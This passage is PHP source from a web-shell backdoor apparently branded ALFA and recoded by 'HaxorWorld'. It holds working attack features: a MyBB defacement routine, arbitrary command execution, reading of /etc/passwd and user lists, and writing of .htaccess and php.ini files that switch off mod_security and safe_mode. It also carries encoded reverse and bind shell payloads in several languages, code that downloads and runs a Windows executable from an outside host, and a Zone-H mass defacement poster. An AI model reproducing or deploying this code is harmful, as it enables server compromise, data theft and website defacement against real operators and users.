  3485. <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
  3486. ";
  3487. $table = array('td1' =>
  3488. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3489. 'td2' =>
  3490. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3491. 'td3' =>
  3492. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3493. 'td4' =>
  3494. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3495. );
  3496. create_table($table);
  3497. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3498. <textarea name=mybbindex rows='19' cols='103'>
  3499. <title>Hacked By HaxorWorld</title><b>Hacked By HaxorWorld</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
  3500. if(isset($_POST['alfa6'])){
  3501. $mybb_dbh = $_POST['alfa6'];
  3502. $mybb_dbu = $_POST['alfa7'];
  3503. $mybb_dbn = $_POST['alfa8'];
  3504. $mybb_dbp = $_POST['alfa9'];
  3505. $mybb_index = $_POST['alfa10'];
  3506. if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
  3507. $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
  3508. $prefix="mybb_";
  3509. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  3510. $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
  3511. __alert('MyBB index changed...!');
  3512. }
  3513. }
  3514. }
  3515. echo "</div>";
  3516. alfafooter();
  3517. }
  3518. function alfaproc()
  3519. {
  3520. alfahead();
  3521. echo "<Div class=header><br><center>";
  3522. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
  3523. $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  3524. if($GLOBALS['sys']=="win"){
  3525. $process=array(
  3526. "Task List" =>"tasklist /V",
  3527. "System Info" =>"systeminfo",
  3528. "Active Connections" => "netstat -an",
  3529. "Running Services" => "net start",
  3530. "User Accounts" => "net user",
  3531. "Show Computers" => "net view",
  3532. "ARP Table" => "arp -a",
  3533. "IP Configuration" => "ipconfig /all"
  3534. );}else{
  3535. $process=array(
  3536. "Process status" => "ps aux",
  3537. "Syslog" =>"cat /etc/syslog.conf",
  3538. "Resolv" => "cat /etc/resolv.conf",
  3539. "Hosts" =>"cat /etc/hosts",
  3540. "Cpuinfo"=>"cat /proc/cpuinfo",
  3541. "Version"=>"cat /proc/version",
  3542. "Sbin"=>"ls -al /usr/sbin",
  3543. "Interrupts"=>"cat /proc/interrupts",
  3544. "lsattr"=>"lsattr -va",
  3545. "Uptime"=>"uptime",
  3546. "Fstab" =>"cat /etc/fstab"
  3547. );}
  3548. foreach($process as $n => $link){
  3549. echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
  3550. }
  3551. echo "</center><br>";
  3552. if(!empty($_POST['alfa1'])){
  3553. echo "<pre class='ml1' style='margin-top:5px' >";
  3554. if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
  3555. echo alfaEx($cmd.$_POST['alfa1'], true);
  3556. echo '</pre>';
  3557. }
  3558. echo "</div>";
  3559. alfafooter();
  3560. }
  3561. function alfasafe(){
  3562. alfahead();
  3563. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
  3564. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
  3565. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
  3566. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3567. echo __pre();
  3568. $solevisible9 = _alfa_file('/etc/named.conf');
  3569. if(is_array($solevisible9)){
  3570. foreach($solevisible9 as $solevisible13){
  3571. if(@eregi('zone',$solevisible13)){
  3572. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
  3573. if(strlen(trim($solevisible14[1][0])) > 2){
  3574. echo $solevisible14[1][0].'<br>';
  3575. }}}
  3576. }
  3577. }else{
  3578. echo __pre();
  3579. $users = _alfa_file("/etc/virtual/domainowners");
  3580. if(is_array($users)){
  3581. foreach($users as $boz){
  3582. $dom = explode(":",$boz);
  3583. echo $dom[0]."\n";}}}}
  3584. if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
  3585. echo '
  3586. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
  3587. if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
  3588. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3589. $site = trim($_POST['alfa7']);
  3590. $rep = str_replace(array("https://","http://","www."),"",$site);
  3591. $user = "";
  3592. if(function_exists("posix_getpwuid") && function_exists("fileowner")){
  3593. if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
  3594. $user = $user['name'];
  3595. }
  3596. }else{
  3597. if(_alfa_can_runCommand(true,true)){
  3598. $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
  3599. }
  3600. }
  3601. if(!empty($user)&&$user!='root'){
  3602. echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
  3603. }else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
  3604. }else{
  3605. $site = trim($_POST['alfa7']);
  3606. $rep = str_replace(array("https://","http://","www."),"",$site);
  3607. $users = _alfa_file("/etc/virtual/domainowners");
  3608. foreach($users as $boz){
  3609. $ex = explode(":",$boz);
  3610. if($ex[0] == $rep){
  3611. echo __pre()."<center><table border='1'>
  3612. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
  3613. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
  3614. if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
  3615. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3616. echo __pre();
  3617. $i = 0;
  3618. while ($i < 60000) {
  3619. $line = @posix_getpwuid($i);
  3620. if (!empty($line)) {
  3621. while (list ($key, $vl) = each($line)){
  3622. echo $vl."\n";
  3623. break;}}$i++;}
  3624. }else{echo __pre();
  3625. $users = _alfa_file("/etc/virtual/domainowners");
  3626. foreach($users as $boz){
  3627. $user = explode(":",$boz);
  3628. echo trim($user[1]).'<br>';}}}
  3629. if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
  3630. echo __pre();
  3631. if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
  3632. for($uid=0;$uid<60000;$uid++){
  3633. $ara = @posix_getpwuid($uid);
  3634. if(!empty($ara)){
  3635. while(list ($key, $val) = each($ara)){
  3636. echo "$val:";
  3637. }echo "\n";}}
  3638. }else{__alert('failed...');}}
  3639. if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
  3640. @__write_file($GLOBALS['cwd'].".htaccess","#Recoded By HaxorWorld\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
  3641. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
  3642. }
  3643. if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
  3644. @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By HaxorWorld(LPH TEAM)");
  3645. echo '<center><b><big> php.ini created...!</center></b></big>';
  3646. }
  3647. if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
  3648. @__write_file($GLOBALS['cwd'].".htaccess","#Recoded By By HaxorWorld\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  3649. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
  3650. }
  3651. echo "<br></div>";
  3652. alfafooter();
  3653. }
  3654. function __get_resource($content){
  3655. return @gzinflate(__ZGVjb2Rlcg($content));
  3656. }
  3657. function __write_file($file, $content){
  3658. if($fh = @fopen($file, "wb")){
  3659. if(fwrite($fh, $content)!==false) return true;
  3660. }
  3661. return false;
  3662. }
  3663. function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
  3664. $res = "<font color='green'>[ Success...! ]</font>";
  3665. $err = "<font color='red'>[ Failed...! ]</font>";
  3666. if($evalOptions!="") $evalOptions = $evalOptions." ";
  3667. if($evalArguments!="") $evalArguments = " ".$evalArguments;
  3668. if($evalType=="c"){
  3669. $tmpdir = ALFA_TEMPDIR;
  3670. chdir($tmpdir);
  3671. if(is_writable($tmpdir)){
  3672. $uniq = substr(md5(time()),0,8);
  3673. $filename = $evalType.$uniq.".c";
  3674. $path = $filename;
  3675. if(__write_file($path, $evalCode)){
  3676. $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
  3677. $pathres = $filename.$ext;
  3678. $evalOptions = "-o ".$pathres." ".$evalOptions;
  3679. $cmd = "gcc ".$evalOptions.$path;
  3680. alfaEx($cmd);
  3681. if(is_file($pathres)){
  3682. if(chmod($pathres, 0755)){
  3683. $cmd = $pathres.$evalArguments;
  3684. alfaEx($cmd);
  3685. }else{$res = $err;}
  3686. unlink($pathres);
  3687. }else{$res = $err;}
  3688. unlink($path);
  3689. }else{$res = $err;}
  3690. }
  3691. return $res;
  3692. }elseif($evalType=="java"){
  3693. $tmpdir = ALFA_TEMPDIR;
  3694. chdir($tmpdir);
  3695. if(is_writable($tmpdir)){
  3696. if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
  3697. $classname = trim($r[1]);
  3698. $filename = $classname;
  3699. }else{
  3700. $uniq = substr(md5(time()),0,8);
  3701. $filename = $evalType.$uniq;
  3702. $evalCode = "class ".$filename." { ".$evalCode . " } ";
  3703. }
  3704. $path = $filename.".java";
  3705. if(__write_file($path, $evalCode)){
  3706. $cmd = "javac ".$evalOptions.$path;
  3707. alfaEx($cmd);
  3708. $pathres = $filename.".class";
  3709. if(is_file($pathres)){
  3710. if(chmod($pathres, 0755)){
  3711. $cmd = "java ".$filename.$evalArguments;
  3712. alfaEx($cmd);
  3713. }else{$res = $err;}
  3714. unlink($pathres);
  3715. }else{$res = $err;}
  3716. unlink($path);
  3717. }else{$res = $err;}
  3718. }
  3719. return $res;
  3720. }
  3721. return false;
  3722. }
  3723. function alfaconnect(){
  3724. alfahead();
  3725. $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
  3726. $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
  3727. $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
  3728. $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
  3729. $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
  3730. $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
  3731. $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
  3732. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
  3733. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
  3734. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
  3735. $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
  3736. foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
  3737. echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
  3738. if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
  3739. $lang = $_POST['alfa1'];
  3740. $ip = $_POST['alfa2'];
  3741. $port = $_POST['alfa3'];
  3742. $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
  3743. $tmpdir = ALFA_TEMPDIR;
  3744. $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
  3745. $allow = array('perl','ruby','python','node');
  3746. eval('$lan=$'.$lang.';');
  3747. if(in_array($lang,$allow)){
  3748. if(__write_file($name,__get_resource($lan))){
  3749. if(_alfa_can_runCommand(true,true)){
  3750. $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
  3751. $out = alfaEx("$lang $name $arg $os");
  3752. if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
  3753. echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
  3754. }
  3755. }else{
  3756. echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
  3757. }
  3758. }
  3759. if($lang=='java'||$lang=='c'){
  3760. $code = __get_resource($lan);
  3761. $out = nl2br(bcinit($lang, $code,'',''));
  3762. echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
  3763. }
  3764. if($lang=='bcwin'){
  3765. $alfa = new AlfaCURL();
  3766. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
  3767. $tmpdir = ALFA_TEMPDIR;
  3768. $f = @fopen($tmpdir.'/bcwin.exe','w+');
  3769. @fwrite($f, $s);
  3770. @fclose($f);
  3771. $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
  3772. }
  3773. if($lang=='php'){
  3774. echo "<pre class=ml1 style='margin-top:5px'>";
  3775. $code = __get_resource($lan);
  3776. if($code!==false){
  3777. $code = "\$target = \"".$arg."\";\n".$code;
  3778. eval($code);
  3779. echo("<center><font color='green'>[ Finished...! ]</font></center>");
  3780. }
  3781. echo "</pre>";
  3782. }
  3783. }
  3784. echo "</div>";
  3785. alfafooter();
  3786. }
  3787. function alfazoneh(){
  3788. alfahead();
  3789. echo '<div class=header>';
  3790. if(!function_exists('curl_version')){
  3791. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
  3792. }
  3793. $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
  3794. $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
  3795. echo '
  3796. <center><br><div class="txtfont_header">| Zone-H Mass Poster |</div><center><br>
  3797. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
  3798. <input type="text" name="defacer" size="67" id="text" placeholder="LPH TEAM 2023" />
  3799. <br>
  3800. <select id="text" name="hackmode" style="width:400px;">';
  3801. $x=1;
  3802. foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  3803. echo '</select><br><select id="text" name="reason" style="width:200px;">';
  3804. $x=1;
  3805. foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  3806. echo '</select><br>
  3807. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
  3808. <p><input type="submit" value=" " name="go" /></p>
  3809. </form></center>';
  3810. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
  3811. ob_start();
  3812. $hacker = $_POST['alfa1'];
  3813. $method = $_POST['alfa2'];
  3814. $neden = $_POST['alfa3'];
  3815. $site = $_POST['alfa4'];
  3816. if(empty($hacker)){
  3817. die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
  3818. }elseif($method == "------------------------------------SELECT-------------------------------------"){
  3819. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
  3820. }elseif($neden == "------------------------------------SELECT-------------------------------------"){
  3821. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
  3822. }elseif(empty($site)){
  3823. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
  3824. }
  3825. $i = 0;
  3826. $sites = explode("\n", $site);
  3827. $alfa = new AlfaCURL();
  3828. while($i < count($sites)){
  3829. if(substr($sites[$i], 0, 4) != "http"){
